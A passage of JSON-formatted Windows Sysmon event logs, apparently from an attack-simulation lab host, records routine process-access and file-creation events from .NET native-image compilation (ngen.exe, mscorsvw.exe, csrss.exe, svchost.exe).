C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:33.945","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00103A590B00}","TargetProcessId":"4476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7274,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:33.976\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224D-5F25-0000-00103CD30C00}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:33.976","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224D-5F25-0000-00103CD30C00}","TargetProcessId":"5076","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7275,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:33.976\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224D-5F25-0000-00103CD30C00}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:33.976","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224D-5F25-0000-00103CD30C00}","TargetProcessId":"5076","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7276,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:33.976\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224D-5F25-0000-00103CD30C00}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:33.976","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224D-5F25-0000-00103CD30C00}","TargetProcessId":"5076","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7277,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:33.991\r\nProcessGuid: {41C8662E-224D-5F25-0000-00103CD30C00}\r\nProcessId: 5076\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13d4-0\\Microsoft.VisualC.dll\r\nCreationUtcTime: 2020-08-01 08:05:33.991","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:33.991","ProcessGuid":"{41C8662E-224D-5F25-0000-00103CD30C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13d4-0\\Microsoft.VisualC.dll","CreationUtcTime":"2020-08-01 08:05:33.991","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7278,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.023\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001048D60C00}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.023","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001048D60C00}","TargetProcessId":"4572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7279,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.023\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001048D60C00}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.023","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001048D60C00}","TargetProcessId":"4572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7280,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.023\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001048D60C00}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.023","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001048D60C00}","TargetProcessId":"4572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7281,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.085\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010B8150C00}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.085","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010B8150C00}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9